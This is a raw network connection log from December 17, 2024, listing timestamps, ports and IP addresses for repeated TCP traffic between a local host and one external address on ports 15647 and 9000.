Dec 17, 2024 08:39:22.181632996 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.182455063 CET	9000	49886	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.182470083 CET	9000	49886	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.182571888 CET	49886	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.182683945 CET	49886	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.235682011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.269455910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.269785881 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.299119949 CET	49892	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.300789118 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.302314043 CET	9000	49886	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.345010996 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.418973923 CET	9000	49892	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.419763088 CET	49892	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.419912100 CET	49892	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.437464952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.437520027 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.461708069 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.461846113 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.539673090 CET	9000	49892	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.557405949 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.557496071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.581665039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.654268026 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.677258015 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.679759979 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.749614954 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.751369953 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.799645901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.799829006 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.872013092 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.919711113 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.919862986 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.992027998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.992144108 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.039670944 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.062717915 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.110639095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.165514946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.165611029 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.184062004 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.235688925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.285286903 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.285433054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.304846048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.345029116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.446461916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.446525097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.477653027 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.532577038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.567580938 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.567683935 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.597547054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.641912937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.670062065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.670171976 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.729374886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.745795012 CET	9000	49892	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.745974064 CET	49892	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.745984077 CET	9000	49892	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.746023893 CET	49892	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.790301085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.822735071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.861196995 CET	49898	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.865818977 CET	9000	49892	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.981147051 CET	9000	49898	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.982316971 CET	49898	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.982460976 CET	49898	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.985426903 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:23.986170053 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:23.988480091 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.032512903 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.102444887 CET	9000	49898	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.105921030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.134855986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.188771009 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.207752943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.299325943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.345026016 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.369604111 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.369688034 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.490050077 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.490431070 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.490556955 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.653551102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.653680086 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.682301998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.735670090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.773870945 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.773933887 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.802721024 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.845024109 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.938036919 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.938262939 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:24.966931105 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:24.967051983 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.058156013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.058377981 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.158232927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.159821033 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.178136110 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.250441074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.250597000 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.280544996 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.308207989 CET	9000	49898	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.308357000 CET	9000	49898	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.308425903 CET	49898	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.308449984 CET	49898	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.371777058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.375780106 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.425236940 CET	49899	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.429171085 CET	9000	49898	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.472117901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.472203016 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.496714115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.545008898 CET	9000	49899	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.545146942 CET	49899	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.545296907 CET	49899	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.562766075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.562880993 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.592114925 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.665050983 CET	9000	49899	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.683664083 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.683747053 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.687798023 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.735662937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.784557104 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.786772966 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.853558064 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.855345011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.875838995 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.906518936 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.923213005 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.975231886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:25.975369930 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:25.998629093 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.048166037 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.137742043 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.137883902 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.167593002 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.220163107 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.237708092 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.237807989 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.257817984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.357726097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.357803106 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.359719038 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.407533884 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.521572113 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.521686077 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.550098896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.595024109 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.598545074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.641765118 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.641895056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.641925097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.742479086 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.743765116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.761869907 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.833930969 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.835078001 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.863671064 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.870191097 CET	9000	49899	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.870232105 CET	9000	49899	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.870284081 CET	49899	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.870418072 CET	49899	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.954896927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:26.954955101 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.986253023 CET	49905	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:26.991197109 CET	9000	49899	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.261843920 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.261876106 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.261914968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.262022972 CET	9000	49905	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.262092113 CET	49905	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.262191057 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.262222052 CET	49905	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.267179012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.267282963 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.382200003 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.382227898 CET	9000	49905	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.382296085 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.385504961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.438905954 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.459240913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.459383965 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.545469999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.545610905 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.579094887 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.651422024 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.651599884 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.665417910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.771560907 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.771677017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.843530893 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.843606949 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.891586065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.963463068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:27.963514090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:27.963597059 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.016926050 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.077775002 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.078015089 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.125664949 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.125794888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.155757904 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.197901011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.198036909 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.245676994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.269970894 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.271785021 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.361520052 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.389786005 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.389991999 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.391608953 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.509826899 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.510008097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.584355116 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.584552050 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.586435080 CET	9000	49905	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.586509943 CET	9000	49905	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.586572886 CET	49905	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.586612940 CET	49905	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.629901886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.689801931 CET	49911	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.702061892 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.703782082 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.704338074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.706456900 CET	9000	49905	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.809839964 CET	9000	49911	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.811744928 CET	49911	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.811913967 CET	49911	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.817631006 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.817929029 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.823807001 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.894207954 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.895811081 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:28.931587934 CET	9000	49911	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:28.937731028 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.015655994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.015784979 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.015883923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.063793898 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.143976927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.144125938 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.305385113 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.307913065 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.328067064 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.328159094 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.427709103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.427784920 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.449029922 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.456309080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.501280069 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.520160913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.522730112 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.589485884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.620975018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.621140003 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.642556906 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.740921021 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.741017103 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.835052013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.835145950 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.860773087 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.933120012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:29.933218956 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:29.954915047 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.053083897 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.053227901 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.147272110 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.147339106 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.149481058 CET	9000	49911	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.149586916 CET	9000	49911	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.149636030 CET	49911	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.149662018 CET	49911	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.217472076 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.217544079 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.245382071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.252986908 CET	49917	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.267148972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.269383907 CET	9000	49911	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.298223019 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.337393045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.337670088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.365478039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.366168976 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.372636080 CET	9000	49917	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.372754097 CET	49917	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.373011112 CET	49917	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.486145973 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.486229897 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.492717028 CET	9000	49917	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.529633045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.531691074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.597573996 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.597912073 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.651386023 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.651525021 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.721672058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.771689892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.825421095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.825472116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.910070896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.910192966 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.945554972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:30.946434021 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:30.963619947 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.017010927 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.066315889 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.067883968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.102236986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.157589912 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.222310066 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.226526976 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.379945993 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.383884907 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.538590908 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.538713932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.572122097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.625380039 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.695827961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.695946932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.696568966 CET	9000	49917	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.696701050 CET	9000	49917	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.696758986 CET	49917	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.701646090 CET	49917	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.814359903 CET	49918	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.821404934 CET	9000	49917	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.850795984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.850893974 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:31.934048891 CET	9000	49918	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:31.934189081 CET	49918	9000	192.168.2.11	92.255.57.75
